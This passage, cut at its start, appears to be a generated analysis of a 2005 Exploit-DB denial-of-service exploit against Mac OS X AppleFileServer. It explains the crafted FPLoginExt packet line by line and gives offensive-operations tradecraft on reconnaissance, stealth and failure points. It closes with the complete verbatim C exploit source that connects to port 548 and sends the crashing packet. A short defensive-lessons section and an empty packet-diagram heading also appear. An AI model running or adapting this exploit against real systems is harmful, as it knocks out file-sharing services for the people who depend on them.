a string or structure. The large size of the `UAM` field itself, combined with these specific bytes, is what causes the crash. * `fploginext.UserNameType = (u_int8_t)'\x11'; memcpy((char *)&(fploginext.UserName),"\x54\x6e\x65\x6d\x6f",5);`: **Set Username.** Sets the username type and a short username "Tnem o". * `fploginext.PathType = (u_int8_t)'\xff'; memcpy((char *)&(fploginext.Pathname),"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",30);`: **Set Pathname.** Sets a path type and fills the `Pathname` field with 30 'A' characters. * `fploginext.pad2 = (u_int8_t)'\xff'; memcpy((char *)&(fploginext.UserAuthInfo),"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBB",30);`: **Set UserAuthInfo.** Sets padding and fills the `UserAuthInfo` field with 30 'B' characters. * `memcpy(packet, &dsi, sizeof(dsi)); packet += sizeof(dsi); memcpy(packet, &fploginext, sizeof(fploginext));`: **Assemble packet.** Copies the populated DSI header and FPLoginExt structure into the provided `packet` buffer. * `int send_packet(char *packet,int *sockfd)`: **Send packet.** Transmits the crafted packet over the established TCP socket. * `int main(int ac, char **av)`: **Main execution flow.** * `banner();`: Calls the banner function. * `if(ac != 2) { usage(*av); }`: Checks for exactly one command-line argument (the IP address). * `connect_afp(av[1],&sockfd)`: Attempts to connect to the target IP. * `generate_packet(packet);`: Calls the function to create the malicious packet. * `send_packet(packet,&sockfd);`: Sends the packet. * `fd_set mySet; ... select(sockfd+1, &mySet, NULL, NULL, &time);`: A `select` call with a very short timeout (50 microseconds). This is likely included to check if the server is still responsive or if the connection is still valid after sending the packet. It doesn't actively do anything to cause the DoS but observes the state. * `close(sockfd);`: Closes the network connection. ### Shellcode/Payload Segments: This exploit does not contain traditional shellcode. Instead, the "payload" is the entire crafted packet sent to the server. The vulnerability lies in how the server processes the `FPLoginExt` structure, specifically the `UAM` field. * **Stage 1: DSI Header (`dsi`)**: This is the initial header that frames the AFP request. It indicates the type of request and its length. * **Stage 2: FPLoginExt Structure (`fploginext`)**: This structure contains the actual data that triggers the vulnerability. * **`AFPVER`**: A version string, likely for identification. * **`UAM`**: The User Authentication Method field. This is the primary target of the exploit. It's initialized with 'p' characters and then specific bytes (`\x0f`, `\xff`, `\x00`, `\xf0`) are injected at particular offsets. The large size (`UAMSIZE = 1022`) and these specific bytes are designed to cause the server to misinterpret data, leading to a crash. The exact mechanism of the crash (e.g., buffer overflow, null pointer dereference) is not explicitly detailed in the code but is implied by the DoS outcome. * **`UserNameType`, `UserName`, `PathType`, `Pathname`, `pad2`, `UserAuthInfo`**: These fields are also populated with arbitrary data. While their specific content might not be the direct cause of the crash, they are part of the overall `FPLoginExt` structure that the server attempts to parse. ## Practical details for offensive operations teams * **Required Access Level**: Network access to the target system is required. No prior authentication or local access is needed. * **Lab Preconditions**: * A target Mac OSX system running an AppleFileServer service (typically enabled by default or easily enabled). * The target system must be reachable over the network. * A Linux or macOS machine to run the exploit code. * The exploit code compiled into an executable. * **Tooling Assumptions**: * A C compiler (like GCC) to compile the exploit code. * Standard networking utilities. * The exploit code itself. * **Execution Pitfalls**: * **Network Connectivity**: Firewalls blocking port 548 (AFP) will prevent the exploit from reaching the target. * **Service Not Running**: If AppleFileServer is not running or is configured to use a different port, the exploit will fail. * **Patched Versions**: Modern macOS versions have likely patched this specific vulnerability. The exploit is effective against older, unpatched systems. * **Incorrect IP Address**: Providing an invalid or unreachable IP address will result in connection errors. * **Packet Corruption**: While unlikely with this simple C code, any manual modification of the packet bytes could lead to unexpected behavior or failure. * **Planning Assumptions**: * The target environment is running a vulnerable version of Mac OSX with AppleFileServer enabled. * The attacker has network visibility and can send TCP packets to port 548 on the target. * The objective is to disrupt service availability, not gain code execution. * **Tradecraft Considerations**: * **Reconnaissance**: Confirm the target is running macOS and that the AFP service is active before attempting exploitation. Tools like `nmap` with appropriate scripts can help identify AFP services. * **Stealth**: While this is a DoS exploit and not designed for stealth, sending a single packet is generally less noisy than persistent scanning. However, network intrusion detection systems (NIDS) might flag unusual traffic to port 548. * **Impact Assessment**: Understand that this exploit will likely crash the AFP service, making file sharing unavailable. This could have significant operational impact. * **Likely Failure Points**: * The target system is not vulnerable (patched). * Network segmentation or firewall rules preventing access to port 548. * The AFP service is not running on the target. * The server's internal handling of malformed packets has changed in a way that prevents a crash (e.g., graceful error handling). ## Where this was used and when This exploit was published in **February 2005**. Exploits from this era were often used in security research, proof-of-concept demonstrations, and potentially by malicious actors targeting older, unpatched systems. The vulnerability was found by Braden Thomas and published by "nemo" on milw0rm.com. It's highly probable that systems running Mac OSX versions from around 2005 or earlier would be susceptible. ## Defensive lessons for modern teams * **Patch Management**: Regularly update operating systems and services to patch known vulnerabilities. This is the most effective defense against exploits like this. * **Network Segmentation & Firewalls**: Restrict access to non-essential services like AFP from untrusted networks. Implement firewalls to block inbound connections to port 548 unless explicitly required. * **Service Hardening**: Disable or restrict services that are not actively used. If AFP is not needed, disable it. * **Intrusion Detection/Prevention Systems (IDS/IPS)**: Configure IDS/IPS to monitor for unusual traffic patterns on common service ports, including AFP. While this specific exploit might be simple, signature-based or anomaly-based detection can help identify such attacks. * **Logging and Monitoring**: Ensure that system and service logs are enabled and regularly reviewed. A crash of the AFP service should be logged, which can help in post-incident analysis. * **Vulnerability Scanning**: Regularly scan your network for known vulnerabilities, including those affecting older operating systems and services. ## ASCII visual (if applicable) This exploit is a simple client-server interaction where the client sends a single malformed packet. A visual representation of the packet structure might be more illustrative than a system architecture diagram.

**Packet Structure (Simplified):**

## Source references * **Paper URL**: [https://www.exploit-db.com/papers/799](https://www.exploit-db.com/papers/799) * **Raw Exploit URL**: [https://www.exploit-db.com/raw/799](https://www.exploit-db.com/raw/799) * **Author**: nemo * **Published**: 2005-02-08 * **Keywords**: OSX, dos --- ## Original Exploit-DB Content (Verbatim) ```text /* [ fm-afp.c ] * -( nemo @ felinemenace.org )- 2005 * * Code for afp bug found by Braden Thomas. * * Again hello to everyone @ irc.pulltheplug.org * * need a challenge? -( http://pulltheplug.org )- */ #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <sys/time.h> #define UAMSIZE 1022 #define AFPVERSIZE 5 #define PATHSIZE 30 #define UASIZE 30 #define AFPNSIZE 5 #define AFPPORT 548 #define BUFSIZE sizeof(dsi)+sizeof(fploginext) //+LEN+sizeof(afpEnd) typedef struct { char AFPVER[AFPVERSIZE] ;} AFPVER_T; typedef struct { char UAM[UAMSIZE] ;} UAM_T; typedef struct { char PATH[PATHSIZE] ;} PATH_T; typedef struct { char UserAuthInfo[UASIZE];} UserAuth_t; typedef struct { char AFPName[AFPNSIZE] ;} AFPName_t; typedef struct dsi { // Data Stream Interface. u_int8_t req; u_int8_t com; u_int16_t id; u_int32_t offset; u_int32_t len; u_int32_t reserved; } DSI_T; typedef struct FPLoginExt { // Establishes a session with a server using an Open Directory domain. u_int8_t command; u_int8_t pad; u_int16_t flags; AFPVER_T AFPVER; UAM_T UAM; u_int8_t UserNameType; AFPName_t UserName; u_int8_t PathType; PATH_T Pathname; u_int8_t pad2; UserAuth_t UserAuthInfo; } FP_LoginExt_T; DSI_T dsi; FP_LoginExt_T fploginext; void banner() { printf(" [ fm-afp.c ]\n"); printf("-( nemo@felinemenace.org )-\n\n"); } void usage(char *progname) { printf("usage: %s <ip address>.\n",progname); exit(1); } int connect_afp(char *ip,int *sockfd) { struct sockaddr_in target_addr; int len; *sockfd = socket(AF_INET, SOCK_STREAM, 0); target_addr.sin_family = AF_INET; target_addr.sin_port = htons(AFPPORT); inet_aton(ip, &(target_addr.sin_addr)); memset(&(target_addr.sin_zero), '\0', 8); if (connect(*sockfd, (struct sockaddr *)&target_addr, sizeof(struct sockaddr)) == -1) { return 1; } return 0; } void generate_packet(char *packet) { int n; dsi.req = '\x00'; dsi.com = '\x02'; dsi.id = (u_int16_t)0x0002; dsi.offset = 0x00000000; dsi.len = 0x00000434; dsi.reserved = 0x00000000; fploginext.command = (u_int8_t)'\x3f'; fploginext.pad = (u_int8_t)'\x00'; fploginext.flags = (u_int16_t)0x0000; memcpy((char *)&(fploginext.AFPVER),"\x04\x6e\x65\x6d\x6f",5); memset((char*)((&fploginext.UAM)),'\x70',sizeof(fploginext.UAM)); fploginext.UAM.UAM[0] = '\x0f'; fploginext.UAM.UAM[1] = '\xff'; fploginext.UAM.UAM[257] = '\xff'; // size of next string. fploginext.UAM.UAM[258] = '\xff'; // fploginext.UAM.UAM[500] = '\x00'; // size of next string. fploginext.UAM.UAM[501] = '\xf0'; // fploginext.UserNameType = (u_int8_t)'\x11'; memcpy((char *)&(fploginext.UserName),"\x54\x6e\x65\x6d\x6f",5); fploginext.PathType = (u_int8_t)'\xff'; memcpy((char *)&(fploginext.Pathname),"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",30); fploginext.pad2 = (u_int8_t)'\xff'; memcpy((char *)&(fploginext.UserAuthInfo),"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBB",30); memcpy(packet, &dsi, sizeof(dsi)); packet += sizeof(dsi); memcpy(packet, &fploginext, sizeof(fploginext)); } int send_packet(char *packet,int *sockfd) { if (send(*sockfd, packet, BUFSIZE, 0) == -1) { return 1; } return 0; } int main(int ac, char **av) { int sockfd; char packet[BUFSIZE]; struct timeval time; banner(); if(ac != 2) { usage(*av); } printf("[+] Connecting to target: %s.\n",av[1]); if(connect_afp(av[1],&sockfd)) { printf("[-] An error has occured connecting to the target.\n"); exit(1); } printf("[+] Generating malicious packet.\n"); generate_packet(packet); printf("[+] Sending packet to target.\n"); if(send_packet(packet,&sockfd)) { printf("[-] Error sending packet.\n"); close(sockfd); exit(1); } fd_set mySet; FD_ZERO(&mySet); FD_SET(sockfd, &mySet); time.tv_sec = 0; time.tv_usec = 50; select(sockfd+1, &mySet, NULL, NULL, &time); close(sockfd); return 0; } // milw0rm.com [2005-02-08]